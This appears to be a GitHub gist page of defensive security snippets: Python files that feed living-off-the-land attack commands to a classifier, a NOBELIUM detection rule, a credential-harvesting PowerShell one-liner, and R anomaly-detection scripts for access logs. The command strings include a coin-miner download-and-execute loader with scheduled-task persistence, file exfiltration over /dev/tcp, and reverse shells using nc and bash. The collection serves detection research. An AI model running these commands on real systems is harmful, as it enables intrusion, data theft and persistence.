View LOLC_CoinMiners.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# LOLBINS coin miner commands from https://lolbas-project.github.io/ | |
# LOLBINS rundll32 execution: https://lolbas-project.github.io/lolbas/Binaries/Rundll32/#execute | |
# LOLBINS regsvr32 execution: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/#execute | |
# References: | |
# WannaMine: https://www.accenture.com/_acnmedia/pdf-46/accenture-threat-analysis-monero-wannamine.pdf | |
# https://logrhythm.com/blog/how-to-enable-process-creation-events-to-track-malware-and-threat-actor-activity/ | |
from lol.api import LOLC, PlatformType | |
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS | |
commands=['cmd /c echo powershell -nop $a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(SCM Event Filter)))) {IEX(New-Object Net.WebClient).DownloadString(http://stafftest.spdns.eu:8000/mate6.ps1)} >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR %temp%\y1.bat &&SCHTASKS /run /TN yas |
View LOLC_FileUploads.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# from GTFOBins: file uploads (exfil) examples via bash, rlogin, and whois | |
# https://gtfobins.github.io/#+file%20upload | |
from lol.api import LOLC, PlatformType | |
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS | |
commands=['bash -c echo -e POST / HTTP/0.9\n\n$(<$LFILE) > /dev/tcp/$RHOST/$RPORT', | |
'rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST', | |
'whois -h $RHOST -p $RPORT base64 $LFILE'] | |
classification, tags = lolc(commands) | |
for command, status, tag in zip (commands, classification, tags): |
View LOLC_ReverseShells.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# from GTFOBins: reverse shell examples via nc, gimp, and bash | |
# https://gtfobins.github.io/#+reverse%20shellc | |
from lol.api import LOLC, PlatformType | |
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS | |
commands=['nc -e /bin/sh $RHOST $RPORT', | |
'gimp -idf --batch-interpreter=python-fu-eval -b import sys,socket,os,pty;s=socket.socket()', | |
'bash -c exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'] | |
classification, tags = lolc(commands) | |
for command, status, tag in zip (commands, classification, tags): |
View rules_windows_nobellium_filedrop.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ | |
"title": "NOBELLIUM FoggyWeb File Drop Sysmon", | |
"description": "After compromising an AD FS server, NOBELIUM was observed dropping version.dll on the system.", | |
"author": "Russ McRee (holisticinfosec), Florian Roth, (@cyb3rops)", | |
"tags": [ | |
"attack.persistence", | |
"attack.defense_evasion" | |
], | |
"level": "critical", |
View sim_toolsmith_demo.xml
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8"?> | |
<sim> | |
<delete>false</delete> | |
<errordirectory>C:\Users\Public\Documents\</errordirectory> | |
<task> | |
<config> | |
<name>PowerShell_test</name> | |
<loop>3</loop> | |
<pause>1000</pause> | |
</config> |
View WaitList.dat.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Stop-Process -name "SearchIndexer" -force;Start-Sleep -m 500;Select-String -Path $env:USERPROFILE\AppData\Local\Microsoft\InputPersonalization\TextHarvester\WaitList.dat -Encoding unicode -Pattern "password" |
View Decomposition_Anomalized_Downloads.R
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
security_access_logs %>% | |
filter(server == "SERVER549521") %>% | |
ungroup() %>% | |
time_decompose(count) %>% | |
anomalize(remainder) %>% | |
plot_anomaly_decomposition() + | |
labs(title = "Decomposition of Anomalized SERVER-549521 Downloads") |
View SERVER-549521_Anomalies_STL+IQR.R
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
SERVER549521 %>% | |
# STL + IQR Anomaly Detection | |
time_decompose(count, method = "stl", trend = "4 months") %>% | |
anomalize(remainder, method = "iqr") %>% | |
time_recompose() %>% | |
# Anomaly Visualization | |
plot_anomalies(time_recomposed = TRUE) + | |
labs(title = "SERVER-549521 Anomalies", subtitle = "STL + IQR Methods") |
View SERVER-549521_Anomalies_Twitter+GESD.R
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
# Get only SERVER549521 access | |
SERVER549521 <- security_access_logs %>% | |
filter(server == "SERVER-549521") %>% | |
ungroup() | |
# Anomalize!! | |
SERVER549521 %>% | |
# Twitter + GESD | |
time_decompose(count, method = "twitter", trend = "4 months") %>% |
View Security_Event_Log_Anomalies.R
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Created from Anomalize project, Matt Dancho | |
# https://github.com/business-science/anomalize | |
security_access_logs %>% | |
# Data Manipulation / Anomaly Detection | |
time_decompose(count, method = "stl") %>% | |
anomalize(remainder, method = "iqr") %>% | |
time_recompose() %>% | |
# Anomaly Visualization | |
plot_anomalies(time_recomposed = TRUE, ncol = 3, alpha_dots = 0.25) + | |
labs(title = "Security Event Log Anomalies", subtitle = "STL + IQR Methods") |
NewerOlder